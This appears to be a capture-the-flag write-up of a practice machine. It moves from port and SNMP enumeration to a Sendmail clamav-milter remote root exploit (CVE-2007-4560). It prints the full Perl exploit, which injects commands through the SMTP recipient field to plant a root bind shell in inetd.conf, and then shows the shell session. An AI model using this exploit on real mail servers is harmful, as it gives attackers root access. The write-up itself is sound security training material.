ClamAV
Enumeration:
Port Scanning:
As always we are going to start with nmap:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 20:03 +03
Nmap scan report for 192.168.219.42 22:16:40 [40/1003]
Host is up, received echo-reply ttl 61 (0.13s latency).
Scanned at 2025-10-01 20:03:43 +03 for 336s
Not shown: 65525 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3w
w6ryEkjNnb74KCooHOjyeGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k
23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1IZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7
s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznfC3fRtmj2e/L9chzg=
| 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH
/fjz9FK4HQPC7WtXY9EgW4IMB+pzX2KZxK2PF0=
25/tcp open smtp syn-ack ttl 61 Sendmail 8.13.4/8.13.4/Debian-3sarge3
| smtp-commands: localhost.localdomain Hello [192.168.45.186], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
|_ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For
more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmas
ter at your site. 2.0.0 End of HELP info
80/tcp open http syn-ack ttl 61 Apache httpd 1.3.33 ((Debian GNU/Linux))
|_http-title: Ph33r
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.33 (Debian GNU/Linux)
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
199/tcp open smux syn-ack ttl 61 Linux SNMP multiplexer
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.0.14a-Debian (workgroup: WORKGROUP)
43523/tcp filtered unknown host-unreach from 10.73.110.248 ttl 62
58146/tcp filtered unknown host-unreach from 10.73.110.248 ttl 62
60000/tcp open ssh syn-ack ttl 61 OpenSSH 3.8.1p1 Debian 8.sarge.6 (protocol 2.0)
| ssh-hostkey:
| 1024 30:3e:a4:13:5f:9a:32:c0:8e:46:eb:26:b3:5e:ee:6d (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALr/RyBq802QXa1Bh4SQEUHqD+p9TEx3SUvPHACbT0tQqR3aali+ifDiOpqMToVaRfWzYOOsoM2Neg0EPa4KsJIwSTkFqjd/3Ynp3Yzus0nN+gtmbQRKzo8QfStr6IGt6kaI6viXl4z3w
w6ryEkjNnb74KCooHOjyeGPi3o89GVnAAAAFQDSg0dwMrSn9juW/XPvo8S8kVOhDQAAAIARaqFuvZCqiTY8i/PITsr5WvyZm8mQ0nuqB6gW6y1h4jDAvtHO4TIZEMJ5vtPst0w9mVSYGVFlukhCqhbJdBigqH1WB1p7kwC78M9k
23zZmzuwbnzYPiLHpEdfFEWdO62ZoCSFBXWOqe1IZaTaRCgUZPeB1QFXRCQ96VrJizPLUAAAAIEArOALxR78fZrUqmUcYOs5tf8wu5xChAUqAfh1ElJ6r3EjcWwXId12jo1uAz0JmCTluUQhjhNDJB6XIgUzoFzW1NZPjGCkex7
s1+2+TUTmqFr6Nr97k2RIy91Bpuxwg5jzE83cKPCOoWVbYlfzAqNkF4xxznfC3fRtmj2e/L9chzg=
| 1024 af:a2:49:3e:d8:f2:26:12:4a:a0:b5:ee:62:76:b0:18 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAviGcDkDxKzv7w++DXy6q+5AJDpG/q8Um8j4BheW9fgwsOvQCuDvLcPUIKMYEz4aUgkt/sSCXu29XTlu79pEkb48+BnaRCKrHLH/YWM79GT6Q5ie9jP47HjjJeCCBI/c02qpkH
/fjz9FK4HQPC7WtXY9EgW4IMB+pzX2KZxK2PF0=
60578/tcp filtered unknown host-unreach from 10.73.110.248 ttl 62
Service Info: Host: localhost.localdomain; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernelAlso I will scan for UDP ports:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -sCVU --top-ports=100 -vv -oA nmap/UPDservices --open 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 20:12 +03
Nmap scan report for 192.168.219.42
Host is up, received echo-reply ttl 61 (0.12s latency).
Scanned at 2025-10-01 20:12:56 +03 for 251s
Not shown: 97 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
137/udp open netbios-ns udp-response ttl 61 Samba nmbd netbios-ns (workgroup: WORKGROUP)
| nbns-interfaces:
| hostname: 0XBABE
| interfaces:
|_ 192.168.219.42
138/udp open|filtered netbios-dgm no-response
161/udp open snmp udp-response ttl 61 SNMPv1 server; U.C. Davis, ECE Dept. Tom SNMPv3 server (public)
| snmp-info:
| enterprise: U.C. Davis, ECE Dept. Tom
| engineIDFormat: unknown
| engineIDData: 9e325869f30c7749
| snmpEngineBoots: 60
|_ snmpEngineTime: 13m00s
| snmp-processes:
<snipped>We can see that we have multiple open ports, we will inspect each one on its own.
SNMP (161):
I will start with snmp, we can use multiple tools to interact with the snmp server, such as onesixtyone, snmpwalk, snmpbulkwalk, snmp-check, etc.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ snmpbulkwalk -c public -v2c -t 10 192.168.219.42
iso.3.6.1.2.1.1.1.0 = STRING: "Linux 0xbabe.local 2.6.8-4-386 #1 Wed Feb 20 06:15:54 UTC 2008 i686"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (317626) 0:52:56.26
iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmpd.local.conf)"
iso.3.6.1.2.1.1.5.0 = STRING: "0xbabe.local"
iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (configure /etc/snmp/snmpd.local.conf)"
<snipped>
iso.3.6.1.2.1.25.4.2.1.2.3773 = STRING: "klogd"
iso.3.6.1.2.1.25.4.2.1.2.3777 = STRING: "clamd"
iso.3.6.1.2.1.25.4.2.1.2.3782 = STRING: "clamav-milter"
iso.3.6.1.2.1.25.4.2.1.2.3791 = STRING: "inetd"
iso.3.6.1.2.1.25.4.2.1.2.3795 = STRING: "nmbd"
iso.3.6.1.2.1.25.4.2.1.2.3797 = STRING: "smbd"
iso.3.6.1.2.1.25.4.2.1.2.3801 = STRING: "snmpd"
iso.3.6.1.2.1.25.4.2.1.2.3802 = STRING: "smbd"
iso.3.6.1.2.1.25.4.2.1.2.3808 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.2.3886 = STRING: "sendmail-mta"
iso.3.6.1.2.1.25.4.2.1.2.3900 = STRING: "atd"
<snipped>We can see that we can access it with the default community string. We will find under the running processes that clamav is running along with sendmail and snmp, etc.
HTTP (80):
Browsing the website:
Nothing realy interesting, just some binary text.
Exploitation:
Using what we have collected so far, I will search for any public exploits for and clamav:
Or simply using searchsploit:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ searchsploit clamav-milter
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution | multiple/remote/4761.pl
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsWe will find that we have one written in perl, I will mirror it to my current directory:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ searchsploit -m multiple/remote/4761.pl
Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
URL: https://www.exploit-db.com/exploits/4761
Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
Codes: CVE-2007-4560
Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/ClamAV/4761.plWe can go through it to understand how the attack goes, and if it has any malicious stuff:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ cat 4761.pl
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;
print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";
if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}
print "Attacking $ARGV[0]...\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";
while (<$sock>) {
print;
}
# milw0rm.com [2007-12-21]It is just command execution in the recipient field of the email, and this script will open us a bind shell on port 31337, I will run it with perl:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ perl 4761.pl 192.168.219.42
Sendmail w/ clamav-milter Remote Root Exploit
Copyright (C) 2007 Eliteboy
Attacking 192.168.219.42...
220 localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3; Wed, 1 Oct 2025 18:18:40 -0400; (No UCE/UBE) logging access from: [192.168.45.186](FAIL)-[192.168.45
.186]
250-localhost.localdomain Hello [192.168.45.186], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-EXPN
250-VERB
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-DELIVERBY
250 HELP
250 2.1.0 <>... Sender ok
250 2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf">... Recipient ok
250 2.1.5 <nobody+"|/etc/init.d/inetd restart">... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 591MIeAQ004239 Message accepted for delivery
221 2.0.0 localhost.localdomain closing connectionThe exploit seems it went correctly.
I will use nmap again to scan if the port opened:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ sudo nmap -p 31337 192.168.219.42
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-01 22:34 +03
Nmap scan report for 192.168.219.42
Host is up (0.21s latency).
PORT STATE SERVICE
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 0.66 secondsIndeed it is open, I will connect to it using netcat:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/ClamAV]
└─$ nc -nv 192.168.219.42 31337
(UNKNOWN) [192.168.219.42] 31337 (?) open
/bin/bash -i
bash: no job control in this shell
root@0xbabe:/#We are already root.
I will get the root flag:
root@0xbabe:/# cat /root/proof.txt
8e715ce73ff4440c8155fe8faaaad31aLast updated